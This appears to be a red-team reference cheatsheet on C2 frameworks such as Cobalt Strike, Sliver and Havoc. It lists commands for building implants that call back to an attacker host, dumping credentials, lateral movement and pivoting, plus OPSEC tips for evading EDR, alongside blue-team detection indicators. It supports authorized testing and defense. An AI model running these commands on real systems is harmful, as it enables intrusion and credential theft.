C2-FRAMEWORKS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Command and Control (C2) frameworks provide red teamers with the ability to manage implants on compromised systems, execute post-exploitation activities, and simulate real-world adversary operations. This cheatsheet covers the most commonly used frameworks, their capabilities, and OPSEC considerations.
COBALT STRIKE#
Commercial framework by Fortra (formerly HelpSystems). Industry standard
for red team engagements.
Key Components:
Team Server: central server managing operators and beacons
Beacon: implant deployed on target (HTTP, HTTPS, DNS, SMB, TCP)
Malleable C2: profile language for customizing traffic and behavior
Aggressor Script: scripting engine for automation and customization
BOFs: Beacon Object Files (in-memory execution, no fork-and-run)
Essential Commands:
# Start Team Server
./teamserver <IP> <password> <malleable_profile>
# Beacon Interaction
beacon> sleep 60 30 # 60s sleep, 30% jitter
beacon> shell whoami # Run shell command (fork-and-run)
beacon> run whoami # Run command (inline)
beacon> execute-assembly tool.exe # .NET in-memory execution
beacon> inline-execute bof.o # Run BOF (no fork-and-run)
beacon> jump psexec TARGET # Lateral movement
beacon> jump winrm TARGET # Lateral movement via WinRM
beacon> dcsync domain.local # DCSync attack
beacon> hashdump # Dump local hashes
beacon> mimikatz sekurlsa::logonpasswords
beacon> socks 1080 # Start SOCKS proxy
beacon> rportfwd 8080 127.0.0.1 80 # Reverse port forward
Malleable C2 Profiles:
- Control HTTP headers, URI paths, POST body format
- Customize process injection behavior
- Modify sleep times, jitter, and spawn-to process
- Emulate specific threat actors or legitimate traffic
- Popular profiles: jquery, amazon, microsoft-update
BOFs (Beacon Object Files):
- Compiled C object files executed in Beacon's memory
- No process creation (avoids fork-and-run detection)
- Popular BOF collections: CS-Situational-Awareness-BOF,
TrustedSec SA BOF, nanodump BOF, InlineWhispers
Detection Indicators:
- Default named pipes: \\.\pipe\msagent_##, \\.\pipe\MSSE-###-server
- Default spawn-to: rundll32.exe (highly suspicious if no args)
- Beacon metadata in HTTP traffic (encoded/encrypted)
- Sleep pattern analysis and jitter detection
- Default certificate on Team Server (port 50050)
SLIVER#
Open-source C2 framework by BishopFox. Modern alternative to Cobalt Strike. Key Features: - Implant types: Session (interactive) and Beacon (asynchronous) - Protocols: mTLS, WireGuard, HTTP(S), DNS - Cross-platform: Windows, Linux, macOS - Multiplayer mode for team operations - Built-in armory for extensions and aliases Essential Commands: # Generate implant sliver> generate --mtls ATTACKER:443 --os windows --arch amd64 --format exe sliver> generate beacon --http ATTACKER:8443 --os windows --skip-symbols # Start listener sliver> mtls --lhost 0.0.0.0 --lport 443 sliver> https --lhost 0.0.0.0 --lport 8443 --domain cdn.legit.com # Session interaction sliver (IMPLANT)> info # Implant info sliver (IMPLANT)> shell # Interactive shell sliver (IMPLANT)> execute-assembly tool.exe # .NET assembly sliver (IMPLANT)> sideload payload.dll # Load DLL sliver (IMPLANT)> portfwd add -r TARGET:3389 -b 127.0.0.1:3389 sliver (IMPLANT)> socks5 start # SOCKS5 proxy sliver (IMPLANT)> psexec -t TARGET # Lateral movement # Pivoting sliver (IMPLANT)> pivots tcp --bind 0.0.0.0:9090 # Generate pivot implant sliver> generate --tcp-pivot PIVOT_HOST:9090 Armory (Extensions): sliver> armory install rubeus # Kerberos attacks sliver> armory install seatbelt # Situational awareness sliver> armory install sharp-hound-4 # BloodHound collection
MYTHIC#
Open-source C2 by its-a-feature. Agent-agnostic, modular architecture. Key Features: - Web-based UI for operation management - Docker-based deployment - Multiple agent types (Apfell, Apollo, Athena, Poseidon, Medusa) - Custom C2 profiles (HTTP, websocket, TCP, SMB) - Extensive logging and tracking for deconfliction Setup: # Install Mythic git clone https://github.com/its-a-feature/Mythic cd Mythic && ./mythic-cli install # Install agents and C2 profiles ./mythic-cli install github https://github.com/MythicAgents/Apollo ./mythic-cli install github https://github.com/MythicC2Profiles/http # Start Mythic ./mythic-cli start Notable Agents: Apollo - Windows C# agent (full-featured, .NET 4.0) Athena - Cross-platform .NET agent Poseidon - macOS/Linux Go agent Medusa - Python agent for macOS/Linux Merlin - Go-based HTTP/2 agent Operations via Web UI: - Task agents through browser interface - File browser for remote file system navigation - Process browser for process management - Credential management and tracking - MITRE ATT&CK mapping for each task
HAVOC#
Open-source C2 framework. Modern alternative with focus on evasion. Key Features: - Demon agent (Windows-focused, position-independent) - Sleep obfuscation (Ekko, Zilean, Foliage) - Indirect syscalls and SSN/syscall address sorting - AMSI/ETW patching built-in - Custom reflective loader - BOF support Setup: # Build and run git clone https://github.com/HavocFramework/Havoc cd Havoc/teamserver && go build ./teamserver server --profile profiles/havoc.yaotl # Client cd Havoc/client && make ./Havoc Demon Agent Features: - Token manipulation and impersonation - Inline .NET assembly execution - BOF execution - SOCKS5 proxy - Sleep mask (encrypt beacon in memory during sleep)
BRUTE RATEL C4 (BRC4)#
Commercial C2 by Chetan Nayak (ParanoidNinja). Advanced evasion focus. Key Features: - Badger agent with multiple evasion techniques - Syscall-based execution (direct/indirect) - Built-in LDAP sentinel for AD enumeration - Sleep mask with stack spoofing - Memory-only execution with no disk writes - Multiple C2 channels (HTTP, HTTPS, DNS, DoH, SMB, TCP) Capabilities: - AMSI/ETW/WLDP bypass - In-memory .NET execution - BOF support - Token manipulation - Kerberos attacks - Port scanning and pivoting - Screenshot and keylogging
FRAMEWORK COMPARISON TABLE#
Feature CobaltStrike Sliver Mythic Havoc BRC4
------- ------------ ------ ------ ----- ----
License Commercial OSS OSS OSS Commercial
Price $5,900/yr Free Free Free $2,500/yr
Platforms Win/Lin/Mac All All Windows Win/Lin/Mac
C2 Channels HTTP/DNS/SMB mTLS/ HTTP/WS/ HTTP/S HTTP/DNS/
/TCP HTTP/DNS TCP/SMB DoH/SMB/TCP
/WG
BOF Support Yes Yes Agent-dep Yes Yes
.NET Execution Yes Yes Yes Yes Yes
Sleep Obfusc. Limited No Agent-dep Yes Yes (adv.)
Syscalls Via BOF No Agent-dep Yes Yes (built-in)
Multiplayer Yes Yes Yes Yes Yes
OPSEC Level Medium-High Medium Medium High High
Documentation Excellent Good Good Fair Good
Community Very Large Large Medium Growing Small
SETUP TIPS#
Infrastructure: - Use redirectors (Apache mod_rewrite, Nginx, CDN) in front of C2 - Separate long-haul C2 from short-haul/interactive C2 - Use domain fronting or CDN-based C2 channels where possible - Register aged domains with clean categorization - Use valid TLS certificates (Let's Encrypt) - Deploy on cloud providers (avoid known C2 IP ranges) Team Server Hardening: - Restrict management ports with firewall rules - Use SSH tunnels for operator connections - Enable authentication and strong passwords - Rotate infrastructure regularly during engagements - Separate staging infrastructure from post-exploitation C2
OPSEC CONSIDERATIONS#
- Customize default profiles (never use defaults in production) - Modify default named pipes, spawn-to processes, user agents - Use sleep times appropriate to the operation (30s-5min for stealth) - Add jitter (20-50%) to avoid beacon pattern detection - Use process injection carefully (prefer same-architecture injection) - Avoid touching disk when possible (in-memory execution) - Kill sessions cleanly when done (remove artifacts) - Monitor for IOCs related to your framework during the operation - Test payloads against target's AV/EDR in a lab first - Use unique payloads per target (avoid hash-based detection)
DETECTION INDICATORS (BLUE TEAM PERSPECTIVE)#
- Unusual process trees (rundll32 spawning cmd/powershell) - Regular callback intervals with consistent timing (beaconing) - Suspicious named pipes for SMB communication - Anomalous DNS query patterns (DNS C2) - Self-signed or mismatched TLS certificates - HTTP traffic with encoded/encrypted POST bodies - Processes with high entropy in-memory regions - Unusual network connections from LOLBins - Parent-child process relationship anomalies - Thread creation in remote processes (injection)